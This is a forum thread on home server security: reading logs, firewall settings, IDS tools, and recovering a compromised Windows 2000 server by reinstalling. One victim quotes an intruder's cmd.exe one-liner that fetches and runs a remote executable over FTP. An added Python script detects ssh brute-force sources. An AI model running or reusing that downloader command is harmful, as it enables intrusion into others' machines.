Mike Mullins' comments are good and I take them to heart. However, still being a novice, and realizing his page was not intended for novices, though perhaps others like me might agree, the question is HOW can I do what he advises? Literally, step by step, how can I . . .
1 check my traffic
2 see if my anti-virus software has been attacked
and so on and so on
thanks
t
Had a prof at the Big U, who described the worst test he ever had:
A. Define the Universe
B. Give three examples
Your question, while valid, is roughly equivalent to that test. You see, Mike's advice is necessarily generic, because there are so many different systems out there, from PCs to Macs to Solaris to Linux to VAXen to mainframes to...well, you get the idea. Not knowing what you're working on, it's tough to make suggestions. However, the easiest answer is to read your log files. In Windows, it's the Event Viewer. In most Linux/Unix boxes, it's usually something like /var/adm/messages. Learn to use the Windows filters, or to grep in L/Unix (or use something like LogWatch -- Google will help with that one). The next step is to go to sans.org, or any of a dozen other sites, and study up on what you should be looking for, because it's different for every different kind of box (and sometimes your firewall logs won't tell you what your web server logs will, so don't expect to catch everything in one place). Have fun with it, learn as much as you can, and let us know how it goes.
I really have no idea what to check on my Windows system. But, I read both the /var/log/auth and /var/log/pf.log on my unix system. The auth log tells me valid/invalid inputs via ssh. Oh, and my ftp logs. I found loads of information in them too. Brute force attempts. The pf log shows me, because of my settings, a pattern of who is being blocked based on my rule set. I'm going to install snort, which is an IDS(???). That analyzes all traffic to identify possible holes and attempts against my system that I have not previously blocked or accounted for.
Dan
Just checked my logs in my AV firewall, and for the windows firewall, then checked event viewer to find two unsuccessful attempts to log in to my account!
I then went to my windows firewall and found that ftp, telnet, remote desktop and http server were all enabled!
I've been tracing IPs to Australia and Sweden. What can I do? I shut down the ports they opened; it seems that the Trend-microcillin firewall is blocking a lot of UDP attempts from ports in the 30k range, and 1026 and 1027.
Scary stuff!
Sure, you might find something but even using filters you are bound to miss something. No sys admin has enough time to stay on top of such a herculean task, not to mention the storage requirements on a Windows server (no syslog built in) can be onerous. Your best bet is to get an IDS that will proactively scan for suspicious behavior and use a tool that will scan the logs for you and alert you based on predefined rule sets.
OK...I have been running a website, ftp server, etc from my home for about 1 year, with no problems. Just this week, my server was completely overtaken, and the sad thing is I caught them, just a little too late. They have completely corrupted my website, emptied all logs....and no telling what else. But what they don't know is that while they were trying to wrap things up, I got their IP address. The address looks like it came from my ISP. Is there anything that I can do to take legal action or find out who this person(s) are? PLEASE HELP...
It is not a business site, but it is a family website with pictures, news, etc. I need to know what I can do. I also discovered how they got in and I have closed that port, but I don't know if they opened any other doors. I have completed virus scans, adware/spyware scans. I also have a command line that was still in the system that I'm not sure what it does...it looks like they were trying to remove their IP address from accessing the FTP site.
THANKS IN ADVANCE FOR THE ADVICE
Is it a windows or unix system?
Do you have a router between you and the machine that was hacked?
-- If you close off the ports at the router, then no matter what the machine thinks is open, it's not open to the world.
I run a unix server at home, and I found I was being pounded on by people looking for ways to get in. I did the following to tighten down my machine.
1). Only opened my ports at the router for ssh, ftp, and the web page.
2). Put in a unix firewall.
- did a lot of reading here, and found some good suggestions for generic blocks that stop spoofing and Linux boxes that are scanning my machine.
3). Started reviewing my logs daily (ssh/ftp/web page), looking for brute force attacks. When I found IPs that I didn't trust in my logs, instant firewalling to all services.
--- I automated some of this through perl and shell scripts. Have these scripts running every 2 minutes to check the logs. I'm looking to get this to be real time.
If you tell me the OS, I might be able to offer some other suggestions, and point you at some tutorials/forum postings/articles to further secure your machine.
Dan
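Dan's routine above (review the ssh/ftp/web logs for brute force attempts, then firewall the untrusted sources) written out as an added example; this is not Dan's own perl or shell, and the sample auth-log lines below are constructed. The threshold, the ten-minute window, the assumed year for the year-less syslog timestamps and the pf rule form are all my assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
# Constructed sample of OpenSSH auth-log lines (not real traffic, RFC 5737 test addresses).
SAMPLE_AUTH_LOG = """\
Mar  3 02:14:01 host sshd[4123]: Failed password for invalid user admin from 203.0.113.5 port 51022 ssh2
Mar  3 02:14:03 host sshd[4125]: Failed password for root from 203.0.113.5 port 51023 ssh2
Mar  3 02:14:05 host sshd[4127]: Failed password for invalid user test from 203.0.113.5 port 51024 ssh2
Mar  3 02:14:07 host sshd[4129]: Failed password for invalid user oracle from 203.0.113.5 port 51025 ssh2
Mar  3 02:14:09 host sshd[4131]: Failed password for root from 203.0.113.5 port 51026 ssh2
Mar  3 02:20:30 host sshd[4142]: Accepted password for dan from 198.51.100.7 port 40002 ssh2
Mar  3 09:00:00 host sshd[4200]: Failed password for root from 192.0.2.9 port 33333 ssh2
Mar  3 09:30:00 host sshd[4201]: Failed password for root from 192.0.2.9 port 33334 ssh2
Mar  3 10:00:00 host sshd[4202]: Failed password for root from 192.0.2.9 port 33335 ssh2
Mar  3 10:30:00 host sshd[4203]: Failed password for root from 192.0.2.9 port 33336 ssh2
Mar  3 11:00:00 host sshd[4204]: Failed password for root from 192.0.2.9 port 33337 ssh2
"""
# Matches sshd "Failed password" lines; syslog timestamps carry no year.
FAILED_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
                       r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)")

def parse_failures(log_text, year=2006):
    """Yield (timestamp, source_ip) for every failed ssh login; the year is assumed."""
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"]

def brute_force_sources(log_text, threshold=5, window_sec=600):
    """Return source IPs with >= threshold failures inside any window_sec-wide window."""
    per_ip = defaultdict(list)
    for ts, ip in parse_failures(log_text):
        per_ip[ip].append(ts)
    flagged = []
    for ip, times in per_ip.items():
        times.sort()
        start = 0                       # sliding window over sorted timestamps
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_sec:
                start += 1
            if end - start + 1 >= threshold:
                flagged.append(ip)
                break
    return sorted(flagged)

def pf_block_rules(ips):
    """Render pf rules that drop every service for the flagged sources."""
    return [f"block in quick from {ip} to any" for ip in ips]
```

Run from cron every couple of minutes over the real log and feed the rendered rules into a pf table; the slow scan from 192.0.2.9 only shows up if the window is widened, which is the kind of miss the next reply warns about.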
It is a Windows 2000 server...with a linksys router between it and the world. I had ftp, web, remote admin web, several gaming and a voice communications application port open. I have closed all of the gaming, voice, remote admin, and web ports..the only thing open now is ftp. Which I feel may have been compromised some way to allow an intruder in.
This is the line I caught him typing in the run line:
cmd.exe /c del i&echo open 207.68.xxx.xxx 32676 > i&echo user 1 1 >> i &echo get e_68.exe >> i &echo quit >> i &ftp -n -s:i &e_68.exe&del i&exit
What does that do exactly?
Is there anything that I can do legally since he has destroyed an electronic property :D?
*dale...
I am not a lawyer, and local laws vary in your available recourse.
General security practices would say if the machine has been compromised it is no longer yours and will not be yours again w/o a format & re-install. No amount of rooting out of intruders is 100% effective, so if you value the services this machine provides, take it offline, archive/disk-image if desired (to find and close the holes), and re-install. I'll second sans.org as an excellent resource for hardening systems.
The learning curve on hardening Windows 2k+ machines is steep but it can be done.
Good luck.
- Logan
I can put Windows Server 2003 instead of 2000....Does anyone have any input as to which one is more secure?
Microsoft did a lot of work securing between releasing Windows 2000 and 2003. You'll find that 2003 doesn't automatically install some services eg IIS, so you'll have to add them yourself (usual thing: add/remove programs, select windows components, select the component you want and drop the cd in the drive etc). Microsoft did this to reduce the attack surface of 2003: the fewer services running, the less there is to attack.
And do remember to go to windows update and get the latest security patches (for preference setup the automatic windows update to do this on a schedule!)
Good luck
I'll second that answer on 2003. Much more secure, plus IIS has been upgraded to version 6 from 5. Big difference in security.
I have completed the 2003 installation and services...All seems good except for logging into my website....NO ONE can log in. I even looked at the asp.net configurations and users, they are all still there. Don't know what to do about that one...It is running from a SQL 2005 express DB...so if any gurus out there would like to help on that situation, I would be much appreciative....
But thanks again for the advice to do a clean sweep and reinstall 2003...It seems to run smoother on that machine as well.
I do understand that anti-virus, windows updates--etc. occur during idle times, however, I seem to be getting activity from the isp TO my network on a regular basis--should I be concerned??
Mix